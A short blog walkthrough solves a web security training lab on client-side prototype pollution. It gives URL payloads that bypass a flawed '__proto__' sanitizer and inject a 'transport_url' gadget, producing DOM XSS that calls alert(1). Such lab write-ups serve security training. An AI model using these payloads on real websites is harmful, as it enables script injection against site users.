29.3 Lab: Client-side prototype pollution via flawed sanitization

This lab is vulnerable to DOM XSS via client-side prototype pollution. Although the developers have implemented measures to prevent prototype pollution, these can be easily bypassed. Find a source that you can use to add arbitrary properties to the global Object.prototype. Identify a gadget property that allows you to execute arbitrary JavaScript.Combine these to call alert() | Karthikeyan Nagaraj

Karthikeyan Nagaraj
2 min readJun 13, 2024

Description

This lab is vulnerable to DOM XSS via client-side prototype pollution. Although the developers have implemented measures to prevent prototype pollution, these can be easily bypassed.

To solve the lab:

  1. Find a source that you can use to add arbitrary properties to the global Object.prototype.
  2. Identify a gadget property that allows you to execute arbitrary JavaScript.
  3. Combine these to call alert().

Solution

  1. Using the prototype pollution source, try injecting an arbitrary transport_url property:
    /?__pro__proto__to__[transport_url]=foo
  2. In the browser DevTools panel, go to the Elements tab and study the HTML content of the page. Observe that a <script> element has been rendered on the page, with the src attribute foo.
  3. Modify the payload in the URL to inject an XSS proof-of-concept. For example, you can use a data: URL as follows:
    /?__pro__proto__to__[transport_url]=data:,alert(1);
  4. Observe that the alert(1) is called and the lab is solved.

--

--

Karthikeyan Nagaraj

Security Researcher | Bug Hunter | Web Pentester | CTF Player | TryHackme Top 1% | AI Researcher | Blockchain Developer